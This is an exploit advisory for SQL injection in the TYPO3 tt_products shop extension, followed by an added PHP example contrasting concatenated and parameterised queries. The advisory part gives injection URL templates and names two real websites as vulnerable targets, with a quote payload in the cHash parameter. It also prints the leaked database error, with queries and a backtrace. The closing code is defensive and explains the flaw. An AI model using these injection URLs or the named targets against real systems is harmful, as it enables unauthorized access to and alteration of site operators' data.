- ##############################################################################################
- # Exploit Title : Typo3 CMS Shop System tt_products 2.9.4 SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 18/02/2019
- # Vendor Homepage : ttproducts.de ~ jambage.com ~ typo3.org
- # Software Download Links :
- extensions.typo3.org/extension/download/tt_products/2.9.4/zip/
- extensions.typo3.org/extension/download/tt_products/2.6.9/zip/
- # Software Information Link : extensions.typo3.org/extension/tt_products/
- # Software Affected Versions : From 2.6.9 to 2.9.4 / All Versions
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ##############################################################################################
- # Description about Software :
- ***************************
- New versions at ttproducts.de. Documented in E-Book "Der TYPO3-Webshop" -
- Shop with listing in multiple languages, with order tracking, photo gallery, DAM,
- product variants, credit card payment and bank accounts, bill, creditpoint,
- voucher system and gift certificates. Latest updates at ttproducts.de.
- ##############################################################################################
- # Impact :
- ***********
- Typo3 Shop System tt_products 2.9.4 [ and other versions ]
- extension for TYPO3 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize
- user-supplied data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application
- and execute arbitrary SQL commands in the application's database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser.
- ##############################################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?id=[ID-NUMBER]&L=[ID-NUMBER]&tt_products%5BbackPID%5D=[ID-NUMBER]&tt_products%5Bproduct%5D=[ID-NUMBER]&cHash=[SQL Injection]
- /shop.html?tt_products%5Barea%5D=energi&tt_products%5Bbegin_at%5D=[ID-NUMBER]&cHash=[SQL Injection]
- ##############################################################################################
- # Example Vulnerable Sites :
- *************************
- [+] globalis.ag/index.php?id=1227&L=1&tt_products%5BbackPID%5D=120&tt_products%5Bproduct%5D=672&cHash=1%27
- [+] tuv-akademie.at/shop.html?tt_products%5Barea%5D=energi&tt_products%5Bbegin_at%5D=50&cHash=1%27
- ##############################################################################################
- # Example SQL Database Error :
- ****************************
- exec_SELECTquery
- ---------------------------
- caller
- *******
- TYPO3\CMS\Core\Database\DatabaseConnection::exec_SELECTquery
- ERROR
- *********
- Unknown column 'textslang.t3ver_label' in 'field list'
- lastBuiltQuery
- ************
- SELECT texts.uid uid,textslang.pid pid,textslang.tstamp tstamp,
- textslang.crdate crdate,textslang.deleted deleted,textslang.t3ver_label t3ver_label,
- textslang.sorting sorting,textslang.hidden hidden,textslang.starttime starttime,
- textslang.endtime endtime,textslang.fe_group fe_group,textslang.title title,texts.marker marker,
- textslang.note note,texts.parentid parentid,texts.parenttable parenttable,
- textslang.sys_language_uid sys_language_uid,textslang.text_uid text_uid
- FROM tt_products_texts texts,tt_products_texts_language textslang
- WHERE texts.uid = textslang.text_uid AND 1=1 AND(texts.parentid = 672 AND texts.parenttable='tt_products' AND
- texts.marker IN('ZUSATZ'))AND textslang.deleted=0 AND textslang.hidden=0
- AND(textslang.starttime<=1550505837)AND(textslang.endtime=0 OR textslang.endtime>1550505837)
- AND textslang.fe_group IN(' ',0,-1)
- AND textslang.sys_language_uid=1
- SELECT uid_local FROM tt_products_tx_onextttproductsarea_coursecat_mm WHERE uid_foreign = energi
- debug_backtrace
- ***************
- require(typo3/sysext/cms/tslib/index_ts.php),index.php#28
- // TYPO3\CMS\Frontend\Controller\TypoScriptFrontendController->INTincScript#232
- // TYPO3\CMS\Frontend\Controller\TypoScriptFrontendController->recursivelyReplaceIntPlaceholdersInContent#3646
- // TYPO3\CMS\Frontend\Controller\TypoScriptFrontendController->INTincScript_process#3679
- // TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->USER#3731
- // TYPO3\CMS\Frontend\ContentObject\UserContentObject->render#862
- // TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->callUserFunction#41
- // call_user_func_array#6663 // tx_ttproducts_pi1_base->main#
- // tx_ttproducts_main->run#72 // tx_ttproducts_main->products_display#588
- // tx_ttproducts_single_view->printView#1053 // tx_ttproducts_text->getChildUidArray#328
- // tx_ttproducts_table_base->get#118 // tx_table_db->exec_SELECTquery#185
- // TYPO3\CMS\Core\Database\DatabaseConnection->exec_SELECTquery#1471
- // TYPO3\CMS\Core\Database\DatabaseConnection->debug#305
- ##############################################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ##############################################################################################
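The second query in the error output above ends in `WHERE uid_foreign = energi`: the `tt_products[area]` request value appears unquoted inside the SQL text. The following is an added example, not code from tt_products or from the advisory's author, contrasting that construction with an integer check plus a bound parameter. The function names, the in-memory SQLite database and the sample rows are assumptions made for illustration.

```php
<?php
declare(strict_types=1);
// Added illustration, not tt_products code; function names are hypothetical.
// The table name is the one in the page's error output; rows are constructed.
const MM = 'tt_products_tx_onextttproductsarea_coursecat_mm';

function demoDb(): PDO   // in-memory SQLite stand-in for the shop database
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE ' . MM . ' (uid_local INTEGER, uid_foreign INTEGER)');
    $db->exec('INSERT INTO ' . MM . ' VALUES (10, 7), (11, 7), (12, 8)');
    return $db;
}

// Weak form: the request value becomes part of the SQL text.
function lookupConcatenated(PDO $db, string $area): array
{
    $sql = 'SELECT uid_local FROM ' . MM . ' WHERE uid_foreign = ' . $area;
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened form: accept only decimal digits, then bind the value as an integer.
function lookupBound(PDO $db, string $area): array
{
    if (!ctype_digit($area)) {
        throw new InvalidArgumentException('area must be a numeric uid');
    }
    $stmt = $db->prepare('SELECT uid_local FROM ' . MM . ' WHERE uid_foreign = :area');
    $stmt->bindValue(':area', (int) $area, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// '7' is constructed; 'energi' and "1'" are the values in the page's URLs.
$db = demoDb();
foreach (['7', 'energi', "1'"] as $area) {
    foreach (['lookupConcatenated', 'lookupBound'] as $fn) {
        try {
            $out = 'rows=' . implode(',', $fn($db, $area));
        } catch (PDOException $e) {
            $out = 'database error: ' . $e->getMessage();
        } catch (InvalidArgumentException $e) {
            $out = 'rejected before SQL: ' . $e->getMessage();
        }
        printf("%-18s %-8s %s\n", $fn, $area, $out);
    }
}
```

With concatenation, both non-numeric values reach the SQL parser and surface as database errors; the bound form rejects them before any query is issued.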